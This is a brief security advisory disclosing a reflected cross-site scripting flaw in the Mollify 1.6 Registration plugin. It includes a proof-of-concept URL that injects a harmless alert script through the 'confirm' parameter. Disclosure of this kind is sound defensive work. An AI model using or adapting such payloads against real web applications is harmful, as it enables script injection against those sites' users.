Home
Consulting
Advisories
Software
Articles
Contact

Mollify 1.6 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in Mollify 1.6 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/mollify/backend/plugin/Registration/index.php?confirm=%3Cscript%3Ealert(0)%3C/script%3E


Copyright © 2018 AutoSec Tools LLC